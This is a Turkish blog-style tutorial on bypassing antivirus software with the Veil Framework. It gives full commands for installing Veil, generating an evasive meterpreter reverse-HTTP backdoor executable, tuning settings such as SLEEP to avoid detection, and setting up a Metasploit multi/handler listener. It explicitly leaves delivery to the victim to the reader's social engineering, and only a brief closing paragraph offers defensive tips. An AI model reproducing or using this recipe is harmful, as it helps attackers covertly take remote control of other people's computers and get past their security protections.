Anti Virüs programlarının ne kadar etkili olduğu forumlarda çok tartışılan  konulardan biri bazıları tercih ederken bazıları bilgisayarı yavaşlattığını düşünüyor her ne kadar işe yaramadığını düşünseniz bile düzgün bir şekilde Bypass etmezsek virüsleri algılayacaklardır. Bu yazımızda Veil ile Anti Virüs programlarını nasıl Bypass ederiz onun anlatacağız. Veil Framework, Metasploit Payloadları içeren Anti Virüs programlarını atlatmak için kullandığımız frameworkdür. Kali Linux işletim sistemi üzerinde yüklü olarak bulunan bu toolu istersek başka işletim sistemlerine de kurabiliriz. Bu tool Anti Virüsleri Bypass etmek için en çok kullanılan toollardan biridir.

Veil Framework Yüklemek

Veil Frameworkü buradaki link üzerinden Git Hub’dan indireceğiz fakat Git Hub’dan indirmek için öncelikle Git’in yüklü olması gerekmektedir.

 apt-get -y install git 

Yukarıda verdiğim komut ile Git’i bilgisayarımıza yüklüyoruz fakat bu komut farklılık gösterebilir biz şuan Kali Linux için yükleme işlemini gerçekleştiriyorum.

 git clone https://github.com/Veil-Framework/Veil.git

Git’i indirdikten sonra yukarıdaki komut ile Veil Frameworkü indirmeye başlayabiliriz. Bu komut, dosyaları bulunduğumuz dizinin üstüne indirir.

 cd Veil ./config/setup.sh --force --silent 

Yukarıdaki komutları vererek Setup dosyasını çalıştırıyoruz. Yüklemesi uzun sürebiliyor ve yüklenirken Python ve Wine’nın yükleme ekranı gelecek. Onları da yüklemeniz gerekecektir. Yükleme bittikten sonra “python3 Veil.py” yada “./Veil.py” diyerek aracımızı çalıştırabiliriz. Veil Framework çalıştığında böyle bir menü ile karşılaşacağız. Komutlara bir göz gezdirdiğimizde MsfConsole kullanmış iseniz komutların benzediğini görebilirsiniz başta belirttiğimiz gibi Veil aracı Metasploit Payloadlarını kullandığı için ve insanlara durmadan kod ezberlemesini önlemek için benzer komutları kullanıyorlar. Komutları incelediğimizde; Exit: Tooldan çıkış yapar. List: Hangi hazır araçları kullanabileceğimiz listeler. Update: Update komutu ile aracımızı güncelleyebiliriz. Use: Use komutuda aynı msfconsoledaki gibi modülleri kullanırken lazım olacak. Aracı devamlı olarak güncellemek çok önemlidir çünkü gün geçtikçe artan zararlılar sayesinde Anti Virüs yazılımları da güncellenmekte ve geliştirilmekte. Listeye baktığımız zaman 2 adet seçenek görürüz. Evasion ve Ordnance. Biz Evasionu kullanıcaz çünkü arka kapıları yaratmak için bize lazım olanlar bu toolun içinde bulunuyor. Use 1 komutunu verdikten sonra Evasionun içine gireceğiz ve karşımıza tekrardan menü ekranı gelecek. Tekrardan list diyerek Payloadları görüntüleyebiliriz. Payloadları incelediğimizde ilk başta hangi programlama dili ile yazıldığı gösterilir. İkinci kısımda ise Session’ı belirtiriz ve en sonda da metodumuz yazarız. Örnek olarak python/meterpreter/rev_http Python dilinde yazılmış meterpreter sessionı ve rev_http metodunu kullandığımızı belirtiyoruz meterpreter en çok kullanılan sessionlar dan biridir. rev_http ise  reverseden gelir ve biz bilgisayara değilde sanki o bize bağlanıyormuş gibi bir algı yaratır bu sayede Anti Virüs programları da virüs olduğunu anlamakta zorlanır.

use python/meterpreter/rev_http

Komutunu vererek Payloadımızı seçelim Payloadı seçtiğimizde alttaki gibi bir ekran ile karşılaşacağız burada bazı ayarlar yapmamız gerekecek. Burada kendi ip adresimiz ve portumuzu ayarlamaya dikkat etmemiz gerekir.

set LHOST Ip

Ip yerine kendi ıp adresimizi yazacağız.

set LPORT 8080

Çakışma olmaması adına kullanmadığım 8080 portunu belirttim sizde bir sıkıntı yaşamamak için kullanmadığınız bir port değerini ayarlayınız. Optional olarak belirtilen ayarları değiştirmek zorunda değiliz fakat değiştirmenizi önermekteyiz çünkü ne kadar iyi ayarlarsanız eğer Anti Virüslerin algılamasını o kadar zorlaştırırsınız basit bir  örnek verecek olursak “SLEEP” kaç saniye sonra virüsün devreye gireceğini belirler bunu kendinize göre özelleştirebilirsiniz eğer direkt devreye girer ise virüs programı bunun virüs olduğunu anlayacaktır. Ayarlarımızı yaptıktan sonra alttaki komutu vererek Payloadımızı onaylıyoruz.

generate

Komutumuzu verdikten sonra Payloadımıza bir isim vermemizi istiyor herhangi bir isim verebilirsiniz. İsim verdikten sonra dosya hakkından bilgiler veriyor buradan dosyanın nereye yazıldığını bularak dosyayı oradan alabiliriz. Dosyamızı hazırladığımıza göre şimdi gelen bağlantıları dinleyip yönetmek için MsfConsole kullanacağız. Terminale MsfConsole yazarak açılmasını bekleyelim.

use exploit/multi/handler

MsfConsole açıldıktan sonra yukarıdaki komutunu veriyoruz.Bu komut bize bağlantıları yönetmemizi ve incelememizi sağlıyor.Artık Payloadımızı tanımlamayabiliriz.

set PAYLOAD windows/meterpreter/reverse_http

Komutunu vererek Payloadımızı tanımlıyoruz ve artık ayarlarımızı yapılandırmaya başlayabiliriz.

 set LHOST İp(Kendi İpmiz) set LPORT 8080 

Komutlarını vererek ip adresimizi ve portumuzu ayarlıyoruz ayarlarımızı tamamladığımıza göre artık dinlemeye başlayabiliriz.

exploit

komutunu vererek bağlantıları dinlemeye başlayabiliriz artık tek yapmamız gereken Payloadımızı karşı tarafa yedirmek. Payloadı karşı tarafa yedirmeyi ise sizin sosyal mühendislik bilginize bırakıyorum. Karşı taraf exe dosyasını çalıştırdığı zaman MsfConsole üzerinden bilgilerine ulaşabiliriz. MsfConsole’u Linuxu kontrol ettiğimiz komutlarla yönetebiliriz. Peki bu saldırıdan nasıl korunuruz ev, ofis gibi yerlerden bağlanıyorsanız indirdiğiniz dosyaları mutlaka virüs taramasından geçirmelisiniz ve bilmediğiniz sitelerden çok fazla dosya indirmemeye özen göstermelisiniz fakat public ortamda bu biraz daha sıkıntı çünkü MITM (Man In The Mıddle) saldırısı ile siz anlamadan saldırganlar istediği dosyayı size indirtebilir bu yüzden MITM saldırılarına yakalanmamak için public ortamlar da arp bilgilerini kontrol etmenizi öneririz.